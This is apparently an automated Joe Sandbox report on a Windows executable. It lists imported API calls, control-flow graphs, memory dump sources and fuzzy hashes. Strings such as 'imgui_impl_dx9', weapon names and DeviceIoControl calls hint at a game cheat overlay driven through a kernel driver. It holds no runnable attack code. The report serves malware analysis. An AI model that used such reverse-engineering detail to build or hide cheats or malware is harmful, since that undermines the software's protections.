                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@$V01@@$V01@_$?setstate@?$basic_ios@Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@D@std@@@1@_V?$basic_streambuf@fclosememset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 764698701-0
                                                                                                                                                                          • Opcode ID: 3f90977c9bb5160d0241650f39575cffeb5559f1ac81b1cdafef803e8c928380
                                                                                                                                                                          • Instruction ID: d73e4fd5fa1a25c2840a8822819318b99d77a5ecba6f9e95399bdb216d0b219c
                                                                                                                                                                          • Opcode Fuzzy Hash: 3f90977c9bb5160d0241650f39575cffeb5559f1ac81b1cdafef803e8c928380
                                                                                                                                                                          • Instruction Fuzzy Hash: A5E1C563A3DA87D7EA40EB51E9DD5792B61FF81BA5F445031E44E82278DE3DE209C700

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.VCRUNTIME140 ref: 00007FF6741739B0
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A00
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A12
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A24
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A36
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173A48
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173A5A
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173A6C
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A7E
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173A90
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AA2
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173AB4
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AC6
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AD8
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AEA
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AFC
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B0E
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B20
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B32
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B44
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B56
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B68
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B7A
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B8C
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF674173B9E
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF674173BB0
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173BC2
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173BD4
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173BE6
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173BF8
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173C0A
                                                                                                                                                                          • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173C1C
                                                                                                                                                                            • Part of subcall function 00007FF674189C20: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF6741894CA,?,?,?,00007FF674189974), ref: 00007FF674189C80
                                                                                                                                                                            • Part of subcall function 00007FF674189C20: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF6741894CA,?,?,?,00007FF674189974), ref: 00007FF674189CA2
                                                                                                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF674173C4A
                                                                                                                                                                          • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF674173C81
                                                                                                                                                                          • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF674173C8B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: D@std@@@std@@U?$char_traits@$??5?$basic_istream@V01@$??1?$basic_ios@??1?$basic_istream@?setstate@?$basic_ios@Init@?$basic_streambuf@fclosememset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1635463032-0
                                                                                                                                                                          • Opcode ID: 399f06ac4ee8284d2e01de1fec0a033de75d2f4f958dbae1fab47520d6034e3d
                                                                                                                                                                          • Instruction ID: 99ae10006db45d208077f791ec827c49d26fcf1f36c7a8b912f7566642321feb
                                                                                                                                                                          • Opcode Fuzzy Hash: 399f06ac4ee8284d2e01de1fec0a033de75d2f4f958dbae1fab47520d6034e3d
                                                                                                                                                                          • Instruction Fuzzy Hash: 7F91DAB3A38A87D7DF40EB14E9D85B96721FF80B49F505032E54E86578EE6DE609CB00

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 2014 7ff674153b00-7ff674153b17 2015 7ff674153b19-7ff674153b23 2014->2015 2016 7ff674153b32-7ff674153b3c 2014->2016 2017 7ff674153b2b-7ff674153b31 free 2015->2017 2018 7ff674153b25 2015->2018 2019 7ff674153b57-7ff674153b61 2016->2019 2020 7ff674153b3e-7ff674153b48 2016->2020 2017->2016 2018->2017 2023 7ff674153b7c-7ff674153b86 2019->2023 2024 7ff674153b63-7ff674153b6d 2019->2024 2021 7ff674153b4a 2020->2021 2022 7ff674153b50-7ff674153b56 free 2020->2022 2021->2022 2022->2019 2027 7ff674153b88-7ff674153b92 2023->2027 2028 7ff674153ba1-7ff674153bab 2023->2028 2025 7ff674153b75-7ff674153b7b free 2024->2025 2026 7ff674153b6f 2024->2026 2025->2023 2026->2025 2029 7ff674153b9a-7ff674153ba0 free 2027->2029 2030 7ff674153b94 2027->2030 2031 7ff674153bad-7ff674153bb7 2028->2031 2032 7ff674153bc6-7ff674153bdd call 7ff6741610c0 2028->2032 2029->2028 2030->2029 2033 7ff674153bb9 2031->2033 2034 7ff674153bbf-7ff674153bc5 free 2031->2034 2037 7ff674153bf8-7ff674153c02 2032->2037 2038 7ff674153bdf-7ff674153be9 2032->2038 2033->2034 2034->2032 2041 7ff674153c1d-7ff674153c27 2037->2041 2042 7ff674153c04-7ff674153c0e 2037->2042 2039 7ff674153beb 2038->2039 2040 7ff674153bf1-7ff674153bf7 free 2038->2040 2039->2040 2040->2037 2045 7ff674153c29-7ff674153c33 2041->2045 2046 7ff674153c42-7ff674153c59 call 7ff674141d40 2041->2046 2043 7ff674153c16-7ff674153c1c free 2042->2043 2044 7ff674153c10 2042->2044 2043->2041 2044->2043 2047 7ff674153c3b-7ff674153c41 free 2045->2047 2048 7ff674153c35 2045->2048 2051 7ff674153c5b-7ff674153c65 2046->2051 2052 7ff674153c74-7ff674153c7e 2046->2052 2047->2046 2048->2047 2053 7ff674153c6d-7ff674153c73 free 2051->2053 2054 7ff674153c67 2051->2054 2055 7ff674153c99-7ff674153cb0 call 7ff674153720 2052->2055 2056 7ff674153c80-7ff674153c8a 2052->2056 2053->2052 2054->2053 2061 7ff674153ccb-7ff674153cd5 2055->2061 2062 7ff674153cb2-7ff674153cbc 2055->2062 2057 7ff674153c8c 2056->2057 2058 7ff674153c92-7ff674153c98 free 2056->2058 2057->2058 2058->2055 2065 7ff674153cd7-7ff674153ce1 2061->2065 2066 7ff674153cf0-7ff674153cfa 2061->2066 2063 7ff674153cc4-7ff674153cca free 2062->2063 2064 7ff674153cbe 2062->2064 2063->2061 2064->2063 2069 7ff674153ce9-7ff674153cef free 2065->2069 2070 7ff674153ce3 2065->2070 2067 7ff674153cfc-7ff674153d06 2066->2067 2068 7ff674153d15-7ff674153d76 call 7ff6741412a0 call 7ff67418ca50 2066->2068 2071 7ff674153d08 2067->2071 2072 7ff674153d0e-7ff674153d14 free 2067->2072 2077 7ff674153d78-7ff674153d82 2068->2077 2078 7ff674153d91-7ff674153d9b 2068->2078 2069->2066 2070->2069 2071->2072 2072->2068 2079 7ff674153d8a-7ff674153d90 free 2077->2079 2080 7ff674153d84 2077->2080 2081 7ff674153d9d-7ff674153da7 2078->2081 2082 7ff674153db6-7ff674153dc0 2078->2082 2079->2078 2080->2079 2085 7ff674153da9 2081->2085 2086 7ff674153daf-7ff674153db5 free 2081->2086 2083 7ff674153ddb-7ff674153de5 2082->2083 2084 7ff674153dc2-7ff674153dcc 2082->2084 2089 7ff674153de7-7ff674153df1 2083->2089 2090 7ff674153e00-7ff674153e0a 2083->2090 2087 7ff674153dd4-7ff674153dda free 2084->2087 2088 7ff674153dce 2084->2088 2085->2086 2086->2082 2087->2083 2088->2087 2091 7ff674153df9-7ff674153dff free 2089->2091 2092 7ff674153df3 2089->2092 2093 7ff674153e0c-7ff674153e16 2090->2093 2094 7ff674153e25-7ff674153e2f 2090->2094 2091->2090 2092->2091 2095 7ff674153e18 2093->2095 2096 7ff674153e1e-7ff674153e24 free 2093->2096 2097 7ff674153e4a-7ff674153e54 2094->2097 2098 7ff674153e31-7ff674153e3b 2094->2098 2095->2096 2096->2094 2099 7ff674153e56-7ff674153e60 2097->2099 2100 7ff674153e6f-7ff674153e79 2097->2100 2101 7ff674153e3d 2098->2101 2102 7ff674153e43-7ff674153e49 free 2098->2102 2103 7ff674153e68-7ff674153e6e free 2099->2103 2104 7ff674153e62 2099->2104 2105 7ff674153e7b-7ff674153e85 2100->2105 2106 7ff674153e94-7ff674153e9e 2100->2106 2101->2102 2102->2097 2103->2100 2104->2103 2107 7ff674153e8d-7ff674153e93 free 2105->2107 2108 7ff674153e87 2105->2108 2109 7ff674153eb9-7ff674153ec3 2106->2109 2110 7ff674153ea0-7ff674153eaa 2106->2110 2107->2106 2108->2107 2113 7ff674153ec5-7ff674153ecf 2109->2113 2114 7ff674153ede-7ff674153ee8 2109->2114 2111 7ff674153eac 2110->2111 2112 7ff674153eb2-7ff674153eb8 free 2110->2112 2111->2112 2112->2109 2115 7ff674153ed7-7ff674153edd free 2113->2115 2116 7ff674153ed1 2113->2116 2115->2114 2116->2115
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                          • Opcode ID: ed0ab48a041c26d5714ec9e793d6fd2dc2e4e43f8a849354b822ba8afec8a84c
                                                                                                                                                                          • Instruction ID: 1658df3dc08645d5d2325ce65d0a90537cb8bee7d8f5da6c0ac64747e9a3f374
                                                                                                                                                                          • Opcode Fuzzy Hash: ed0ab48a041c26d5714ec9e793d6fd2dc2e4e43f8a849354b822ba8afec8a84c
                                                                                                                                                                          • Instruction Fuzzy Hash: 46B1F632A2AB86C6FF95AF61D4D86B863A0FF45F81F085536C90DC7361DF2DA584CA10

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 2327 7ff67415f050-7ff67415f0a5 call 7ff674142650 2330 7ff67415f0ab-7ff67415f0be fseek 2327->2330 2331 7ff67415f329 2327->2331 2333 7ff67415f0c4-7ff67415f0d3 ftell 2330->2333 2334 7ff67415f320-7ff67415f323 fclose 2330->2334 2332 7ff67415f32b-7ff67415f352 call 7ff67418c910 2331->2332 2333->2334 2336 7ff67415f0d9-7ff67415f0e9 fseek 2333->2336 2334->2331 2336->2334 2338 7ff67415f0ef-7ff67415f0fc 2336->2338 2339 7ff67415f104-7ff67415f113 malloc 2338->2339 2340 7ff67415f0fe 2338->2340 2339->2334 2341 7ff67415f119-7ff67415f133 fread 2339->2341 2340->2339 2342 7ff67415f15b-7ff67415f244 fclose 2341->2342 2343 7ff67415f135-7ff67415f145 fclose 2341->2343 2346 7ff67415f246-7ff67415f24d 2342->2346 2347 7ff67415f2b3-7ff67415f31e call 7ff67415ec70 2342->2347 2344 7ff67415f14d-7ff67415f156 free 2343->2344 2345 7ff67415f147 2343->2345 2344->2331 2345->2344 2348 7ff67415f250-7ff67415f25b 2346->2348 2347->2332 2350 7ff67415f25d-7ff67415f25f 2348->2350 2351 7ff67415f269-7ff67415f2af call 7ff674142470 2348->2351 2350->2351 2353 7ff67415f261-7ff67415f267 2350->2353 2351->2347 2353->2348 2353->2351
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: fclose$fseekmalloc$freadfreeftell
                                                                                                                                                                          • String ID: %s, %.0fpx$C:\Windows\Fonts\Impact.ttf
                                                                                                                                                                          • API String ID: 3453272378-2114150515
                                                                                                                                                                          • Opcode ID: 2a6148419f9644b3a47be057d96881cb73d5b6a0069fa1c5b547ae3bc183bf11
                                                                                                                                                                          • Instruction ID: 25278a9b1b06126c0ec6a2cfc03e09f5ea421d50f23cd2d3db4cfec3dceded33
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a6148419f9644b3a47be057d96881cb73d5b6a0069fa1c5b547ae3bc183bf11
                                                                                                                                                                          • Instruction Fuzzy Hash: 9A91B322918BC4C5F7529F6DA8452F9B3B0FF99759F046234EE8952724EF39D186CB00

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PerformanceQueryexit$CounterCreate9Direct3Frequencymalloc
                                                                                                                                                                          • String ID: @$OTTO$imgui_impl_dx9$imgui_impl_win32
                                                                                                                                                                          • API String ID: 2444153533-2332507762
                                                                                                                                                                          • Opcode ID: 3550654e626a951f75ff777aebffe3de3d5987d6568e5e281cdee769aa9871d8
                                                                                                                                                                          • Instruction ID: 73fe6e9ef03882e5093ad4f2d39312a413a70efb42d3fdf71ce4d84f8dc57e4d
                                                                                                                                                                          • Opcode Fuzzy Hash: 3550654e626a951f75ff777aebffe3de3d5987d6568e5e281cdee769aa9871d8
                                                                                                                                                                          • Instruction Fuzzy Hash: 12D12972A18B85C6E311EF25E8883B977B4FB44388F104139DA9887764DF7DE1A5CB00
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memchr$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: Rifl$Shotgun$Snip
                                                                                                                                                                          • API String ID: 876120417-932107277
                                                                                                                                                                          • Opcode ID: 66e72a0edbe80e8409554611263e30abaff70906721db7f4eb8277106bf39c49
                                                                                                                                                                          • Instruction ID: e142a2e3a1983f1a2d750878fe73b9468c19a82dededa2eef08736fff09b1e15
                                                                                                                                                                          • Opcode Fuzzy Hash: 66e72a0edbe80e8409554611263e30abaff70906721db7f4eb8277106bf39c49
                                                                                                                                                                          • Instruction Fuzzy Hash: 7F51C363B3D741C5FA55EB20E4882B963A0EB58BA4F944231E66D83BC5DF3CE942C700
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF67417E8B0: memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E8E8
                                                                                                                                                                            • Part of subcall function 00007FF67418A030: DeviceIoControl.KERNEL32 ref: 00007FF67418A0E9
                                                                                                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF674172963
                                                                                                                                                                            • Part of subcall function 00007FF67417E8B0: memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E988
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741728B1
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674172ACC
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674172B0D
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674172B5E
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674172B9E
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674172BFA
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674172C77
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674172CC3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$ControlDevicememcpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2471032920-0
                                                                                                                                                                          • Opcode ID: cbfd7e03b946ee20cd95debc597430403996987513b6cce6d13e935f369098e1
                                                                                                                                                                          • Instruction ID: 2529e725b6a054c0001d67cb197d01d984bd2867e7c521eb52fe61e9c0da7e2f
                                                                                                                                                                          • Opcode Fuzzy Hash: cbfd7e03b946ee20cd95debc597430403996987513b6cce6d13e935f369098e1
                                                                                                                                                                          • Instruction Fuzzy Hash: 60E1AF63F28B86C5FB10EB64D4883BD2761EB557A4F505232EA6D57AD9EF38E081C340
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: freemalloc$memcpy
                                                                                                                                                                          • String ID: ?
                                                                                                                                                                          • API String ID: 3519880569-1684325040
                                                                                                                                                                          • Opcode ID: 3aec656839632b3a9f7a1788794446eb268fc2257a53afcec555d603ff44c36d
                                                                                                                                                                          • Instruction ID: 3f1978ff264d7205149407b0bc104b625edbdb40ca8ab5a19397fc2dd2a67630
                                                                                                                                                                          • Opcode Fuzzy Hash: 3aec656839632b3a9f7a1788794446eb268fc2257a53afcec555d603ff44c36d
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E714733A19B81C6EB55DF25D4882B8B7A4FB48B44F089239CE8D87351EF38E4A5C700
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
